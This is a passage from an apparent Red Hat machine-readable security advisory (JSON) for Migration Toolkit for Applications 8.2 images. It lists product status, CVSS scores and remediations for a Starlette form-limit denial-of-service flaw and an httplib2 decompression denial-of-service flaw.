"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2491440"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Starlette where the request.form() method silently ignores configured resource limits (max_fields and max_part_size) when parsing application/x-www-form-urlencoded data. An unauthenticated attacker can exploit this by sending a urlencoded request body with an arbitrarily large number of fields or an oversized field, causing denial of service through resource exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "starlette: Starlette: request.form() limits silently ignored for application/x-www-form-urlencoded enable DoS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in Starlette where the request.form() method silently ignores configured resource limits (max_fields and max_part_size) when parsing application/x-www-form-urlencoded data. An unauthenticated attacker can exploit this by sending a urlencoded request body with an arbitrarily large number of fields or an oversized field, causing denial of service through resource exhaustion. This only affects applications that explicitly call request.form() on urlencoded input; JSON-only APIs and services where Starlette is a transitive dependency not used for form parsing are not affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54283"
},
{
"category": "external",
"summary": "RHBZ#2491440",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491440"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54283",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54283"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54283",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54283"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/security/advisories/GHSA-82w8-qh3p-5jfq",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-82w8-qh3p-5jfq"
}
],
"release_date": "2026-06-22T16:46:16.706000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "starlette: Starlette: request.form() limits silently ignored for application/x-www-form-urlencoded enable DoS"
},
{
"cve": "CVE-2026-59939",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-07-08T20:02:11.756520+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2498212"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in httplib2, a Python HTTP client library. This vulnerability allows a malicious or compromised HTTP server to send a small compressed data payload that, when decompressed by httplib2, expands to an extremely large size in memory. This unbounded decompression can lead to a Denial of Service (DoS) by causing the client application to run out of memory and crash.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "httplib2: httplib2: Denial of Service via unbounded decompression of HTTP response bodies",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in `httplib2` allows a remote attacker to trigger a Denial of Service (DoS) in client applications. By sending a specially crafted, compressed HTTP response, a malicious server can cause the client to exhaust its memory due to unbounded decompression, leading to application crashes. This poses a significant risk to Red Hat products that use `httplib2` to process untrusted HTTP content.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
